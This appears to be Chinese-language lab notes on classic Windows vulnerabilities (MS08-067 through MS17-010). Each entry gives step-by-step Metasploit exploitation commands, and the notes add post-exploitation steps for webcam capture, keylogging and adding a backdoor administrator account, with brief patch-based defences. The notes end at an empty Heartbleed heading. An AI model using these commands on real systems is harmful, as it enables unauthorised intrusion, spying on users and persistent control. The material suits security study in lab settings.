网络安全中常见的主机漏洞

常见主机漏洞

1.MS08_067

  • 利用端口:445
    类型:缓冲区溢出漏洞、远程任意指令执行漏洞RCE
    范围:win2000、xp、server 2003、vista、server 2008、7 Beta
    补丁:KB958644
    描述:如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。
  • 操作步骤:
    环境:kali xp英文版
    利用工具 metasploit
    命令:
msfconsole 

search ms08_067

use 0

show options

set rhosts xp'ip

show target 34(7)

show payloads

set payload 44

run/exploit
  • 实验补充:
webcam_stream 	打开摄像头返回视频流

webcam_snap		打开摄像头返回照片

ps							展示当前运行的进程信息

migrate [pig 号]		切换进程

keyscan_start 		开始键盘监听

keyscan_dump		打印监听到的内容

keyscan_stop 		结束键盘监听

shell 进入到windows命令行下 whoami 查看当前账户是谁

dir 查看文件

net user hacker 123456/add

net localgroup administrators hacker /add

rdesktop xp'ip 打开远程桌面登陆xp
  • 防御
    方法1:安装补丁
    方法2:防火墙关闭445端口

2.MS12_020

  • 利用端口:3389(RDP协议)
    类型:缓冲区溢出漏洞、远程任意指令执行漏洞RCE、拒绝服务漏洞
    范围:xp、server 2003、vista、server 2008
    补丁:KB2621440
    描述:如果攻击者向受影响的系统发送一系列特制 RDP 数据包,则这些漏洞中较严重的漏洞可能允许远程执行代码,或造成系统拒绝服务。
  • 操作步骤
    实验环境 kali、win2003
    利用工具:metasploit
    命令:
msfconsole

search ms12_020

use 1

show options

set rhosts win2003'ip /24

run/exploit

search ms12_020

use 0

show options

set rhosts win2003'ip

run/exploit
  • 防御
    方法1:安装补丁
    方法2:防火墙关闭3389端口

3.MS11_003

  • 利用协议:HTTP协议
    漏洞类型:缓冲区溢出漏洞、远程任意指令执行漏洞(RCE)
    影响范围: IE6、IE7、IE8
    微软安全公告:KB2482017
    漏洞描述:
    这些漏洞可在用户使用 Internet Explorer 查看特制 Web 页面或者用户打开一个加载特制库文件的合法 HTML 文件时允许远程执行代码。
  • 操作步骤
    环境:kali win7
    工具:metasploit
  • 命令:
- msfconsole

  search ms11_003

  use 0

  show options

  set srvhost kali'ip

  show options

  set uripath a

  exploit/run

  sessions

  sessions 1

  shell

  whoami

-

防御

方法1:安装补丁
方法2 : 使用其他浏览器的最新版本

4.MS14_064

  • 利用协议:HTTP协议
    漏洞类型:缓冲区溢出漏洞、远程任意指令执行漏洞(RCE)
    影响范围: windows2003、2008、2012、vista、win7、win8
    微软安全公告:KB3010788
    漏洞描述:
    OLE即对象连接与嵌入技术。OLE不仅是桌面应用程序集成,而且还定义和实现了一种允许应用程序作为软件“对象”彼此进行“连接”的机制。Microsoft Windows处理特制OLE对象文件的方式中存在远程代码执行漏洞,成功利用后可允许攻击者以当前用户权限执行任意代码。
  • 操作步骤
    环境kali win7
    工具 metasploit
    命令:
msfconsole

search ms14_064

use 0

show options

show payloads

set payload 50

show  options

set AllowPowershellPrompt true

show options

show targets

set target 1

show options

run

sessions

sessions 1

shell

whoami
  • 防御
    方法1:安装补丁
    方法2 : 不使用IE系列浏览器

5.MS17_010

  • 利用协议:SMB
    漏洞类型:缓冲区溢出漏洞、远程任意指令执行漏洞(RCE)
    影响范围: windows2003、2008、2012、2016、vista、win7、win8、win10(1511/1607版)
    微软安全公告:KB4012598、KB4012212、KB4012215
    漏洞描述:
    如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。
  • 操作步骤
    环境kali win7
    工具 metasploit
    命令:
msfconsole

search ms17_010

use 1

show options

set rhosts win7' ip

run

search

use 2

set rhosts win'ip

run

net user hacker 123 /add
net localgroup administrators hacker /add
ctrl+c
rdesktop [win7的ip]
  • 防御:
    安装补丁

6.heartbleed漏洞